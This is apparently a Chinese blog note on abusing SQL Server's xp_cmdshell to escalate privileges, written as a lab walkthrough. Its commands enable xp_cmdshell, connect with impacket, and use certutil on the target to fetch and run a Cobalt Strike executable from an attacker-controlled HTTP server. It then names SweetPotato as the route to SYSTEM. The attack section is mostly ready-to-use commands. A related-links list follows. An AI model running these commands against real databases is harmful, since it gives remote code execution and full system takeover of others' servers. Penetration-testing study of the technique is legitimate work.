SQL Server数据库xp_cmdshell提权笔记

文章目录

一、简介

Sql server也称Mssql Server,扩展存储过程中xp_cmdshell是一个开放接口,可以让SQLserver调用cmd命令。此存储过程在SQLserver2000中默认开启,2005本身及之后的版本默认禁止,所以想要使用该存储过程,就需要拥有SA账号相应权限,使用sp_configure将其开启。
xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展"存贮过程"。那么"存储过程",其实质就是一个"集合",就是存储在Sql Server中预先定义好的"SQL语句集合",说的更直白一些就是各种小脚本共同组成的集合体,我们称之为"存储过程"。

二、搭建环境

系统 IP 服务
windows server2012 10.10.10.40 SQL serve数据库
kali-linux 10.10.10.234 攻击方-cobaltstrike

三、利用条件

复制代码
任何版本的Sql Server都可以对xp_cmdshell 进行利用;
SQL Server数据库没有被降权;
sa用户或其他具有dba权限的账户。
1、查询 xp_cmdshell 是否开启,返回为1则证明存在
复制代码
select count(*) from master.dbo.sysobjects where xtype = 'x' and name ='xp_cmdshell';
2、判断权限是不是sa,回是1说明是sa
3、开启xp_cmdshell
复制代码
xp_cmdshell 开关。
【参数解析】
exec 显示或更改当前服务器的全局配置设置。
sp_configure 动态执行SQL语句的命令。

进行开启

复制代码
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
4、关闭xp_cmdshell
复制代码
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;

四、获取数据库权限

1、成功获取sqlserver,进行登陆
复制代码
路径:~/Desktop/impack/impacket-master/examples
命令:python3  mssqlclient.py [email protected]
2、开启xp_cmdshell权限
复制代码
exec xp_cmdshell whami
exec xp_cmdshell ipconfig
enable_xp_cmdshell


3、服务器端开启cobaltstrike,并且开启exe远程访问
复制代码
python3 -m http.server 9999
4、执行命令,进行上线
复制代码
xp_cmdshell certutil -urlcache -split -f http://10.10.10.234:9999/123.exe c:/windows/temp/123.exe                                                                            
xp_cmdshell c:/windows/temp/123.exe
5、成功获取数据库权限

五、提升为管理员权限

1、选取插件SweetPotato(MS16-075)
2、选取刚才上线的sqlserver用户权限
3、此时成功变成system权限

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

相关推荐
RedMery28 分钟前
论文阅读笔记:Denoising Diffusion Implicit Models (4)
论文阅读·笔记
dleei31 分钟前
MySql安装及SQL语句
数据库·后端·mysql
go_bai1 小时前
Linux环境基础开发工具——(2)vim
linux·开发语言·经验分享·笔记·vim·学习方法
信徒_1 小时前
Mysql 在什么样的情况下会产生死锁?
android·数据库·mysql
吴梓穆1 小时前
UE5学习笔记 FPS游戏制作35 使用.csv配置文件
笔记·学习·ue5
100分题库小程序1 小时前
2025年机动车授权签字人考试判断题分享
经验分享·笔记
V---scwantop---信1 小时前
失真扭曲斑点效果ps标题文本特效滤镜样机 Color Blob Distort Text & Logo Effect
笔记
嘴对嘴编程2 小时前
oracle数据泵操作
数据库·oracle
nuo5342023 小时前
黑马 C++ 学习笔记
c语言·c++·笔记·学习
阿噜噜小栈3 小时前
最新国内可用的Docker镜像加速器地址收集
运维·笔记·docker·容器